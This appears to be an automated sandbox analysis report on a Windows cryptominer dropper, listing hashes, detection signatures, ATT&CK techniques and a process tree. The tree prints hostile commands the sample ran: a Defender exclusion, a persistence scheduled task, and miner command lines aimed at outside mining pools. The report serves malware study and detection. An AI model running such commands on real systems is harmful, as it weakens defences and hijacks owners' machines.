cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

Analysis

max time kernel
300s
max time network
286s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
19/09/2022, 10:31

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
Size

862KB
MD5

a69b4b080114c6c20c5471ad5613e3bf
SHA1

e2bff2d6b4e3742e5f88b54285abe2286742257a
SHA256

cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c
SHA512

c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137
SSDEEP

6144:7lwUrVjuSJHQ7ngOzI53XvrxC8e7IDnUc5D8pDF8Z5+ECLsrski+xk30+TeE0Hu0:LVRQgDzxCUFM55sXi/00f70us

Score

8^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1364	DHUZT.exe
316	DHUZT.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2224-213-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral2/memory/2224-215-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1364 set thread context of 4448	1364	DHUZT.exe	79
PID 1364 set thread context of 2224	1364	DHUZT.exe	82

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4316	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3692	timeout.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3844	powershell.exe
3844	powershell.exe
3844	powershell.exe
4496	powershell.exe
4496	powershell.exe
4496	powershell.exe
1364	DHUZT.exe
1364	DHUZT.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	1532	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeIncreaseQuotaPrivilege	3844	powershell.exe
Token: SeSecurityPrivilege	3844	powershell.exe
Token: SeTakeOwnershipPrivilege	3844	powershell.exe
Token: SeLoadDriverPrivilege	3844	powershell.exe
Token: SeSystemProfilePrivilege	3844	powershell.exe
Token: SeSystemtimePrivilege	3844	powershell.exe
Token: SeProfSingleProcessPrivilege	3844	powershell.exe
Token: SeIncBasePriorityPrivilege	3844	powershell.exe
Token: SeCreatePagefilePrivilege	3844	powershell.exe
Token: SeBackupPrivilege	3844	powershell.exe
Token: SeRestorePrivilege	3844	powershell.exe
Token: SeShutdownPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeSystemEnvironmentPrivilege	3844	powershell.exe
Token: SeRemoteShutdownPrivilege	3844	powershell.exe
Token: SeUndockPrivilege	3844	powershell.exe
Token: SeManageVolumePrivilege	3844	powershell.exe
Token: 33	3844	powershell.exe
Token: 34	3844	powershell.exe
Token: 35	3844	powershell.exe
Token: 36	3844	powershell.exe
Token: SeDebugPrivilege	1364	DHUZT.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeIncreaseQuotaPrivilege	4496	powershell.exe
Token: SeSecurityPrivilege	4496	powershell.exe
Token: SeTakeOwnershipPrivilege	4496	powershell.exe
Token: SeLoadDriverPrivilege	4496	powershell.exe
Token: SeSystemProfilePrivilege	4496	powershell.exe
Token: SeSystemtimePrivilege	4496	powershell.exe
Token: SeProfSingleProcessPrivilege	4496	powershell.exe
Token: SeIncBasePriorityPrivilege	4496	powershell.exe
Token: SeCreatePagefilePrivilege	4496	powershell.exe
Token: SeBackupPrivilege	4496	powershell.exe
Token: SeRestorePrivilege	4496	powershell.exe
Token: SeShutdownPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeSystemEnvironmentPrivilege	4496	powershell.exe
Token: SeRemoteShutdownPrivilege	4496	powershell.exe
Token: SeUndockPrivilege	4496	powershell.exe
Token: SeManageVolumePrivilege	4496	powershell.exe
Token: 33	4496	powershell.exe
Token: 34	4496	powershell.exe
Token: 35	4496	powershell.exe
Token: 36	4496	powershell.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 1532 wrote to memory of 3844	1532	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	66
PID 1532 wrote to memory of 3844	1532	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	66
PID 1532 wrote to memory of 4856	1532	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	68
PID 1532 wrote to memory of 4856	1532	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	68
PID 4856 wrote to memory of 3692	4856	cmd.exe	70
PID 4856 wrote to memory of 3692	4856	cmd.exe	70
PID 4856 wrote to memory of 1364	4856	cmd.exe	72
PID 4856 wrote to memory of 1364	4856	cmd.exe	72
PID 1364 wrote to memory of 4496	1364	DHUZT.exe	73
PID 1364 wrote to memory of 4496	1364	DHUZT.exe	73
PID 1364 wrote to memory of 704	1364	DHUZT.exe	75
PID 1364 wrote to memory of 704	1364	DHUZT.exe	75
PID 704 wrote to memory of 4316	704	cmd.exe	77
PID 704 wrote to memory of 4316	704	cmd.exe	77
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 1364 wrote to memory of 4448	1364	DHUZT.exe	79
PID 4448 wrote to memory of 3820	4448	vbc.exe	80
PID 4448 wrote to memory of 3820	4448	vbc.exe	80
PID 1364 wrote to memory of 2224	1364	DHUZT.exe	82
PID 1364 wrote to memory of 2224	1364	DHUZT.exe	82
PID 1364 wrote to memory of 2224	1364	DHUZT.exe	82
PID 1364 wrote to memory of 2224	1364	DHUZT.exe	82
PID 1364 wrote to memory of 2224	1364	DHUZT.exe	82
PID 1364 wrote to memory of 2224	1364	DHUZT.exe	82
PID 1364 wrote to memory of 2224	1364	DHUZT.exe	82

C:\Users\Admin\AppData\Local\Temp\cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
"C:\Users\Admin\AppData\Local\Temp\cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAF9E.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4856
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:3692
- - C:\ProgramData\ccl\DHUZT.exe
    "C:\ProgramData\ccl\DHUZT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4496
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:704
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:4316
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 7
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4448
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:3820
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --user t1fd8D4s9ZYr87E5HaqJJehhTWq5G4A5X2z.APOCALYPSE --port 2001 --pool us-flux.fluxpools.net --pass x --coin flux
      4⤵
      PID:2224

C:\ProgramData\ccl\DHUZT.exe
C:\ProgramData\ccl\DHUZT.exe
1⤵
- Executes dropped EXE
PID:316

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ccl\DHUZT.exe

Filesize
862KB

MD5
a69b4b080114c6c20c5471ad5613e3bf

SHA1
e2bff2d6b4e3742e5f88b54285abe2286742257a

SHA256
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

SHA512
c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

Download Submit
C:\ProgramData\ccl\DHUZT.exe

Filesize
862KB

MD5
a69b4b080114c6c20c5471ad5613e3bf

SHA1
e2bff2d6b4e3742e5f88b54285abe2286742257a

SHA256
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

SHA512
c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

Download Submit
C:\ProgramData\ccl\DHUZT.exe

Filesize
862KB

MD5
a69b4b080114c6c20c5471ad5613e3bf

SHA1
e2bff2d6b4e3742e5f88b54285abe2286742257a

SHA256
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

SHA512
c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHUZT.exe.log

Filesize
1KB

MD5
9bfb0f51f319fb79c0bb1f4f9fcfc7e1

SHA1
367776be8a224b0ee8271dce1723eb675a1964b2

SHA256
35d5a38e77d2755271f2897bcfdd673d3d8daa0e6e412c7272fac51aacb101f3

SHA512
0b103c722c983d513724c36da13de8b18845c3a1e4a311326947e448d304a2dbdd717d914ceeb9e8e11a6083f8ccaf7abad1bf4a2ac22e21de91d6cc74ec17bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eb5e51fa77ede7c861d59e40ee804010

SHA1
4d070fbab9dde343ebbd88384583e20658c13ee2

SHA256
6ef1b6ff147885dffc8e785713ae595b83010b1edeba8297394b615c8b8fa060

SHA512
34ecc603ddc206d72fb67c5f960b9d615d6f20e4103d7fe7202e8f674c4684fd1e06e31b2b4b936a3d0e6c305a2b1b9eaefa6919e29976595004221fb12e8787

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAF9E.tmp.bat

Filesize
137B

MD5
535e38ca876997550482573a182c7426

SHA1
52011524435ce59c0c310abfe7aa7f0837b296ff

SHA256
613e70ca3510412212092fafdcc321d79d5e7b59a9f9452bffc5672c549acc50

SHA512
e0a3a7653135a1a5fc2a7d3ef26db1b147f282a6a86365d61b50df4aff66ecbf7b2796b530e65dcf0671ef467f061f688cab5852a037ad347a1056874af7a2e3

Download Submit
memory/1532-120-0x0000000000250000-0x000000000032C000-memory.dmp

Filesize
880KB

Download
memory/2224-215-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/2224-213-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/3844-133-0x0000020FD7EA0000-0x0000020FD7F16000-memory.dmp

Filesize
472KB

Download
memory/3844-130-0x0000020FBEEA0000-0x0000020FBEEC2000-memory.dmp

Filesize
136KB

Download
memory/4448-208-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4448-209-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4448-206-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4448-211-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4448-212-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download